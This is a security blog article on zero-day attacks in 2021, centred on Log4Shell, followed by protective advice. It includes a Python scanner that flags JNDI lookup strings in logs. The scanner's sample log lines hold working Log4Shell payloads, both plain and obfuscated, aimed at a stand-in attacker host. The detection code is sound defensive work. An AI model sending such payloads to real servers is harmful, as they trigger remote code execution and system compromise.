Responding to Zero-Days in 2022

The Covid-19 pandemic in 2020 forced many businesses to adopt remote work, and in turn opened a shopping window for cybercriminals: while organizations tried to protect themselves in uncharted territory, attackers went looking for zero-day exploits. Zero-day attacks continued to rise in 2021 as cybercriminals developed more sophisticated tools to exploit weaknesses in systems, and roughly twice as many zero-day attacks were recorded as in 2020. That statistic can be misleading, though, because detection also improved, and it is entirely possible that more zero-days were recorded simply because better detection systems were in place to catch them. By the same logic we can expect the count to rise again in 2022, but the year should be judged on how successful these attacks are rather than simply on how many are recorded.

What have we learned from 2021? 

One of the most prominent lessons of 2021 is that any competent, technically minded person with no prior hacking experience can obtain the tools and software needed to exploit vulnerabilities in systems. They do not need access to the dark web either: these tools are a web browser search away, and anyone can get their hands on them. The rapid global proliferation of such tooling is one contributing factor in the higher rate of reported zero-days. Threat actors are pouring investment into zero-days for their own use, and they are reaping the rewards. It is a worrying thought that anyone can become a "hacker" overnight with tools designed to do the work for them. At least 66 zero-days were found in use in 2021, according to databases such as the 0-day tracking project, almost double the total for 2020 and more than in any other year on record. Log4Shell and PrintNightmare were the highest-profile zero-day exploits of 2021, and both continue to be a problem coming into 2022.

Log4j is a Java-based logging library that developers use to record what their applications and services are doing, so that problems can be traced and diagnosed; it is embedded in an enormous range of software. The exploit of its best-known flaw has been coined Log4Shell (CVE-2021-44228): Log4j 2 expands lookup expressions such as ${jndi:ldap://...} that appear inside logged messages, so an attacker who can get such a string into any field that ends up in a log (a User-Agent header, a username, a form field) can make the server fetch and execute attacker-controlled code. If left unfixed, it allows cybercriminals to break into servers and systems, where they can:

  • Steal passwords and credentials
  • Exfiltrate data and lock it away
  • Infect networks with malicious software
  • Mine cryptocurrency on the compromised hosts
  • Enlist hosts into distributed denial-of-service (DDoS) botnets
  • Deploy ransomware

With Log4j embedded in software used by millions of people, the attack surface is enormous, and the consequences can linger long after an initial compromise given how much damage can be done and how freely the tools are available.
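The lookup mechanism described above is also what makes Log4Shell probes easy to hunt for in web server logs. The following Python script is an added example, not part of the original article or of any Nclose tooling: it URL-decodes each line, folds the ${lower:...}, ${upper:...} and ${key:-default} lookups that attackers commonly use to disguise the string, and then checks for the ${jndi: lookup. The access-log lines and IP addresses are constructed for illustration.

```python
"""Detect Log4Shell-style JNDI lookup strings in log lines (added example).

Log4j 2 expands ${...} lookups found inside a logged message, so an attacker
places a string such as ${jndi:ldap://attacker/x} in any field that ends up
in a log. Real probes are often obfuscated with other lookups that Log4j
resolves first; this script folds those decoys the same way before checking.
"""
import re
from urllib.parse import unquote

# Innermost ${...} expression (no nested ${ or } inside).
INNER = re.compile(r"\$\{([^${}]*)\}")
# The lookup that actually triggers the remote class/object load.
JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _fold(expr):
    """Return the text a decoy lookup evaluates to, or None if it is not a decoy."""
    if ":-" in expr:
        # ${key:-default}: when the key does not resolve (empty prefix, unset
        # env var, ...) Log4j emits the default text verbatim.
        return expr.split(":-", 1)[1]
    head, sep, rest = expr.partition(":")
    if sep and head.lower() == "lower":
        return rest.lower()
    if sep and head.lower() == "upper":
        return rest.upper()
    return None  # e.g. the jndi lookup itself, or an unrelated ${...}


def normalize(text, max_rounds=16):
    """Resolve nested decoy lookups from the inside out until nothing changes."""
    for _ in range(max_rounds):
        changed = False

        def repl(m):
            nonlocal changed
            folded = _fold(m.group(1))
            if folded is None:
                return m.group(0)
            changed = True
            return folded

        text = INNER.sub(repl, text)
        if not changed:
            break
    return text


def is_jndi_probe(line):
    """True if the line carries a JNDI lookup after URL-decoding and de-obfuscation."""
    return bool(JNDI.search(normalize(unquote(line))))


def scan(lines):
    """Return (line_number, de-obfuscated line) for every suspicious line."""
    hits = []
    for n, line in enumerate(lines, 1):
        if is_jndi_probe(line):
            hits.append((n, normalize(unquote(line))))
    return hits


# Constructed sample access-log lines (not real traffic): lines 1 and 5 are benign.
SAMPLE_LOG = [
    '10.0.0.7 - - [10/Dec/2021:14:02:11 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:14:02:15 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.23:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:14:02:16 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:rmi}://198.51.100.23:1099/a}"',
    '10.0.0.9 - - [10/Dec/2021:14:02:17 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:${env:NaN:-ldap}://198.51.100.23/x}"',
    '10.0.0.12 - - [10/Dec/2021:14:02:20 +0000] "GET /price?total=${amount} HTTP/1.1" 200 88 "-" "curl/7.68.0"',
    '10.0.0.9 - - [10/Dec/2021:14:02:21 +0000] "GET /%24%7Bjndi%3Adns%3A//198.51.100.23/z%7D HTTP/1.1" 404 0 "-" "-"',
]

if __name__ == "__main__":
    for n, shown in scan(SAMPLE_LOG):
        print(f"line {n}: {shown}")
```

Run against the constructed sample, lines 2, 3, 4 and 6 are flagged and the two benign lines are not. Log4j supports more lookups than the three folded here, so treat a hit as a reason to investigate the host and a miss as no guarantee; the reliable fix remains upgrading the library.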

How can you protect yourself in 2022? 

  • Patch updates: Keep track of vendor patches and updates and apply them promptly; even if you have already been hit by a zero-day, patching protects against, or at least mitigates, follow-on attacks. If you are a software developer, producing those patches as quickly as possible should be a priority. 
  • Identification and Response: Should you be attacked or compromised, have measures in place to contain the attack, identify its root cause, and manage the recovery period that follows. 
  • User Education: Many zero-day attacks rely on human error to gain a foothold; it is important that employees and colleagues practise safe online housekeeping and report anything suspicious immediately. 
  • Preventative measures: Keep firewalls updated and correctly configured, run current anti-virus or endpoint detection software, block access to risky sites, attachments and emails, and make sure all patches are up to date. 
  • Vulnerability Management: The need for a comprehensive vulnerability management program is greater than ever. Regular scanning of assets, with remediation prioritised using a risk-based approach, has been found to be more effective than patching in arbitrary order. Good vulnerability management tools are available that let you cover the full vulnerability management life cycle, including continuous monitoring of critical assets, and ensure standards are maintained. 
  • Investing in a cybersecurity partner: A cybersecurity partner lets you focus on your business operations while they run the systems and advanced technology designed to deal with zero-day exploits. They monitor patch releases constantly and keep developing systems to protect you better, which in the long term could save your business from attacks that would otherwise have been detrimental. Such partners provide a managed service that takes full responsibility for the tools, vulnerability management included, giving the business peace of mind to concentrate on other priorities. 

Fortunately, just as cybercriminals have advanced in their efforts to find exploits, the cybersecurity industry has advanced in detecting them and making life difficult for attackers, spurred on by the severity of the zero-day attacks of 2021. More companies are equipped with, or investing in, cybersecurity measures to protect themselves, and as more attacks happen, users' understanding grows with them. As much as cybersecurity focuses on protection, many of its advances have come from failure and from learning from mistakes, and 2022 is the year to put right the mistakes of 2021. 

Furthermore, the fact that 66 zero-days were found in use indicates that our defences are improving and that we can detect more complex attacks than before. That is a positive when looking ahead into 2022. 

Article Credit and Resource: Stewart Gilburt, Team Lead – Vulnerability Management for Nclose